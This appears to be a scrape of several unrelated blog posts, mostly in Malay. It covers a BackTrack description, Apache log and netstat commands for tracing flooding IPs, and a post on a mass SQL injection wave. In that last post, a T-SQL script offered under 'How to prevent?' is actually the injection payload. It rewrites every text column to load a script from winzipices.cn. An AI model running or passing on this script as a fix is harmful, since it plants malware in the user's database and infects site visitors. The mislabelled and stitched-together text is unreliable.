BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community. The BackTrack Project is funded by Offensive Security.

Useful links for BackTrack:

1. Download
2. Forum
3. Laptop Compatibility
4. Wireless Card Compatibility

Related Posts:

• No Related Posts

tail -n 10000 apache_access.log|cut -f 1 -d ' '|sort|uniq -c|sort -nr|more

Perhatikan Top IP. Siasat IP tu. Jika perlu masukan dalam kandang firewall, masukkan.

netstat -n|grep :80|cut -c 45-|cut -f 1 -d ':'|sort|uniq -c|sort -nr|more

Arahan ini akan memaparkan connection IP aktif pada port 80. Ubah cut-c 45 - jika perlu kerana alamat IP mungkin tidak bermula dengan ruangan 45. Arahan ini juga akan memaparkan jika ada banjir UDP.

cut -f 2 -d '"' apache_access.log|cut -f 2 -d ' '|sort|uniq -c|sort -nr|more

Arahan yang akan memaparkan senarai URL yang paling banyak hits. Kadang kadang serangan bukan pada web tapi pada file tertentu.

cut -f 4 -d '"' apache_access.log|sort|uniq -c|sort -nr|more

Arahan ini memaparkan URL dan User Agent. Kemungkinan mereka menggunakan User Agent tunggal dalam serangan.

End of Kemaskini
Untuk tutor ini gua guna SUSE 10.1.

1. Cek load server

   top -u wwwrun

   wwwrun adalah nama service untuk Apache. Dstro lain mungkin guna nama lain. apache contohnya. Cek guna command ps aux
   Jika pada part CPU. Kalau %CPU meningkat (80-100%) mungkin ada masalah.

2. Cek ada berapa service Apache yang running.

   ps -ef | grep httpd | wc -l

   Enter dalam purata sepuluh kali. Kalau semua dibawah 50 kira orait. Kalau lebih mesti ada sesuatu.

3. Untuk cek concurrent connection pada Apache gunakan command ini: netstat

   netstat -nap --inet | grep -i :80 | wc -l

   Untuk cek pada port 80 sahaja, guna command ini:

   netstat -anpt|egrep -v ^Active\|^Proto\|LISTEN |awk '{ print $4":"$5 }' |cut -f 3,2 -d ':'|sort |uniq -c|sort -n

4. Cek listening IPs:

   netstat -tn

   Dari sini boleh tahu jika dia datang dari DHCP pool, maknanya ada attack.

Arahan dibawah mungkin membantu:
Current apache connection flags:

netstat -plan | grep :80 | awk '{print $6}' | sort | uniq -c | sort -rn

PTR finder:

cat list | while read ip ; do dig -x $ip | grep PTR | grep -v "^;" ; done
dig -x x.x.x.x | grep PTR | grep -v "^;"

Related Posts:

• No Related Posts

There seems to be a new wave of sql injections ending with ngg.js. Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India

How to prevent?

Open your SQL Tool Analyzer and type this:

DECLARE @T VARCHAR(255)
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* SYSNAME */ OR
[B].[XType] = 167 /* VARCHAR */)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE (@@FETCH_STATUS = 0)
BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''<script src="http://winzipices.cn/2.js"></script>''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor 

Check your coding?

Download Scrawlr to find code vulnerability.

Related

ASCII Encoded/Binary String Automated SQL Injection Attack
Preventing SQL Injections

Related Posts:

• No Related Posts